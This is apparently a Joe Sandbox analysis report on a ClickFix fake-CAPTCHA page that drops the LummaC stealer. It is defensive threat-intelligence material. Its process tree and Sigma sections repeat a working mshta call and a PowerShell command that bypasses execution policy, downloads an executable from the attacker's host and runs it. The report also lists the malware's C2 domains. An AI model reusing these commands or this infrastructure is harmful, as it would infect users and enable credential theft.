Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://rea.grupolalegion.ec/p.php/1

Overview

General Information

Sample URL:https://rea.grupolalegion.ec/p.php/1
Analysis ID:1631656
Infos:

Detection

CAPTCHA Scam ClickFix, LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Found malware configuration
Multi AV Scanner detection for dropped file
Yara detected CAPTCHA Scam ClickFix
Yara detected LummaC Stealer
AI detected suspicious Javascript
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
HTML page adds supicious text to clipboard
HTML page contains obfuscated javascript
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 1292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cmd.exe (PID: 4684 cmdline: cmd /K mshta https://rea.grupolalegion.ec/p.php MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 760 cmdline: mshta https://rea.grupolalegion.ec/p.php MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 5292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Captcha.exe (PID: 1920 cmdline: "C:\ProgramData\Captcha.exe" MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)
          • Captcha.exe (PID: 3392 cmdline: none MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_74JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.Captcha.exe.14ac000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              12.2.Captcha.exe.14ac000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                12.2.Captcha.exe.1632000.2.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  12.2.Captcha.exe.1632000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    12.3.Captcha.exe.1632000.11.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      Click to see the 2 entries

                      HTML

                      SourceRuleDescriptionAuthorStrings
                      1.4.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
                        1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Suspicious Invoke-WebRequest Execution
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Suspicious MSHTA Child Process
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Suspicious PowerShell Parameter Substring
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5292, TargetFilename: C:\ProgramData\Captcha.exe
                          Sigma detected: PowerShell Web Download
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Usage Of Web Request Commands And Cmdlets
                          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 760, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 5292, ProcessName: powershell.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-07T13:21:58.720947+010018100032Potentially Bad Traffic190.92.154.206443192.168.2.849723TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-07T13:21:58.547161+010018100002Potentially Bad Traffic192.168.2.849723190.92.154.206443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for dropped file
                          Source: C:\ProgramData\Captcha.exeAvira: detection malicious, Label: TR/Redcap.lcybk
                          Found malware configuration
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\Captcha.exeReversingLabs: Detection: 39%
                          Sample uses string decryption to hide its real strings
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: culasova.icu
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: explorebieology.run
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: gadgethgfub.icu
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: moderzysics.top
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: techmindzs.live
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: codxefusion.top
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: phygcsforum.life
                          Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmpString decryptor: techspherxe.top

                          Phishing

                          barindex
                          Yara detected CAPTCHA Scam ClickFix
                          Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                          Source: Yara matchFile source: dropped/chromecache_74, type: DROPPED
                          AI detected suspicious Javascript
                          Source: 0.4.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rea.grupolalegion.ec/p.php/1... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to execute remote commands and potentially steal user data. The combination of these factors indicates a high risk of harm and should be treated with caution.
                          HTML page contains obfuscated javascript
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: (function(_0x4a4c13,_0x1ba179){const _0x10f3e2=_0x2875,_0x478ffb=_0x4a4c13();while(!![]){try{const _
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: No favicon
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: No favicon
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: No favicon
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: No favicon
                          Source: https://rea.grupolalegion.ec/p.php/1HTTP Parser: No favicon
                          Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49723 version: TLS 1.2
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esi+14h], edx12_3_0186E8D2
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]12_3_01857051
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]12_3_01849051
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]12_3_01869051
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+68106D6Eh]12_3_0186E077
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+68106D6Eh]12_3_0186E077
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]12_3_0183DBB0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]12_3_01833BB0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]12_3_0184BBB0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]12_3_0185DBB0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov byte ptr [edi], al12_3_0186EDEF
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh12_3_0183CDF0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh12_3_01832DF0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh12_3_0184ADF0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh12_3_0185CDF0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-5B941F00h]12_3_0185B50D
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-5B941F00h]12_3_0186D50D
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]12_3_0183B620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_3_0183B620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]12_3_01845620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_3_01845620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]12_3_01853620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_3_01853620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]12_3_01865620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_3_01865620
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]12_3_0186967A
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]12_3_0184967A
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]12_3_0185767A
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esp+0Ch], ebx12_2_00509030
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov dword ptr [esp], edx12_2_005224F0
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov edi, ebp12_3_0183F9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then not ebx12_3_0183F9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov edi, ebp12_3_018359B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then not ebx12_3_018359B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov edi, ebp12_3_0184D9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then not ebx12_3_0184D9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then mov edi, ebp12_3_01861030
                          Source: C:\ProgramData\Captcha.exeCode function: 4x nop then not ebx12_3_01861030

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: culasova.icu
                          Source: Malware configuration extractorURLs: explorebieology.run
                          Source: Malware configuration extractorURLs: gadgethgfub.icu
                          Source: Malware configuration extractorURLs: moderzysics.top
                          Source: Malware configuration extractorURLs: techmindzs.live
                          Source: Malware configuration extractorURLs: codxefusion.top
                          Source: Malware configuration extractorURLs: phygcsforum.life
                          Source: Malware configuration extractorURLs: techspherxe.top
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49723 -> 190.92.154.206:443
                          Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 190.92.154.206:443 -> 192.168.2.8:49723
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /p.php/1 HTTP/1.1Host: rea.grupolalegion.ecConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /p.php/1?js HTTP/1.1Host: rea.grupolalegion.ecConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rea.grupolalegion.ec/p.php/1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rea.grupolalegion.ecConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rea.grupolalegion.ec/p.php/1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /p.php/1?js HTTP/1.1Host: rea.grupolalegion.ecConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /p.php HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rea.grupolalegion.ecConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /Viber.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rea.grupolalegion.ecConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: rea.grupolalegion.ec
